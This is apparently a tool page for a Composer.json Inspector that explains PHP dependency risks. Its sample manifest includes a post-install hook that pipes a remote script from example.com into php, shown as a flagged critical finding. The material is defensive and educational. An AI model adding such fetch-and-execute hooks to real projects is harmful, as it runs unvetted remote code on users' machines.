Inspecteur Composer.json

Analysez composer.json pour contraintes permissives et dépendances dupliquées

Analyzing composer.json for PHP Supply Chain Security

Composer is the standard dependency manager for PHP projects, with composer.json defining all external packages, autoloading configuration, lifecycle scripts, and platform requirements. Each dependency introduces third-party code that executes in your application's context — from request handling middleware to database abstractions. Overly permissive version constraints allow untested code into production, dangerous scripts execute during installation, and missing stability settings can introduce alpha-quality packages into stable releases.

The Composer.json Inspector analyzes your PHP dependency manifest for supply chain risks, version constraint issues, and configuration problems. It detects wildcard version constraints, duplicate packages across require and require-dev, deprecated minimum-stability settings, dangerous lifecycle scripts, and missing PHP version constraints. All analysis runs entirely in your browser — your dependency configuration never leaves your device.

Version Constraint Analysis

Composer uses a version constraint syntax that determines which package versions are installable. The inspector evaluates constraints for security and stability risks:

  • "*" — Accepts any version including majors (dangerous for production)
  • ">=2.0" — No upper bound, accepts future incompatible majors
  • "^2.0" — Allows non-breaking updates within the same major (standard practice)
  • "~2.0" — Allows patch updates only within minor (conservative)
  • "2.0.5" — Exact version pin (most predictable, hardest to maintain)
  • "dev-main" — Tracks a branch, completely unstable and unreproducible

For security-sensitive packages (authentication, encryption, session management), the inspector recommends tighter constraints. Branch aliases and dev stability flags are flagged as production risks since they reference unreleased, potentially broken code.

Lifecycle Scripts and Installation Hooks

Composer scripts execute automatically during dependency lifecycle events, similar to npm's lifecycle hooks. The inspector detects potentially dangerous script configurations:

  • post-install-cmd — Runs after composer install completes
  • post-update-cmd — Runs after composer update completes
  • pre-autoload-dump — Runs before autoload files are generated

Legitimate scripts include cache clearing, asset compilation, and framework optimizations. Suspicious patterns include downloading remote scripts, executing encoded commands, or modifying files outside the project directory. The inspector flags scripts that reference external URLs, use base64 encoding, or invoke system commands that are atypical for PHP package installation workflows.

Platform Requirements and Stability Settings

Missing platform configuration leads to environment-specific failures that only manifest during deployment:

  • Missing PHP version requirement: Without "php": "^8.1" in the require section, Composer may install packages incompatible with your production PHP version.
  • Missing extension requirements: Packages depending on extensions like ext-redis, ext-imagick, or ext-intl should be declared explicitly to catch missing extensions before deployment.
  • Dangerous minimum-stability: Setting "minimum-stability": "dev" allows installation of unstable packages across all dependencies, not just the specific package that needs it. Use stability flags on individual packages instead.
  • Missing prefer-stable: Without "prefer-stable": true, Composer may choose dev versions when multiple satisfying versions exist.

Code Examples

composer.json with Issues Detected by Inspector

{
  "name": "acme/web-app",
  "require": {
    "laravel/framework": ">=9.0",
    "guzzlehttp/guzzle": "*",
    "phpunit/phpunit": "^10.0",
    "firebase/php-jwt": "dev-main"
  },
  "require-dev": {
    "guzzlehttp/guzzle": "^7.0"
  },
  "minimum-stability": "dev",
  "scripts": {
    "post-install-cmd": [
      "curl -sS https://example.com/setup | php"
    ]
  }
}

// Inspector findings:
// - HIGH: "laravel/framework" >= 9.0 — no upper version bound
// - CRITICAL: "guzzlehttp/guzzle" "*" — wildcard constraint
// - WARN: "phpunit/phpunit" in require — test framework belongs in require-dev
// - WARN: "guzzlehttp/guzzle" in both require and require-dev
// - CRITICAL: "firebase/php-jwt" dev-main — branch tracking for auth library
// - HIGH: minimum-stability "dev" — allows unstable packages globally
// - CRITICAL: post-install-cmd downloads and executes remote script
// - INFO: Missing PHP version constraint in require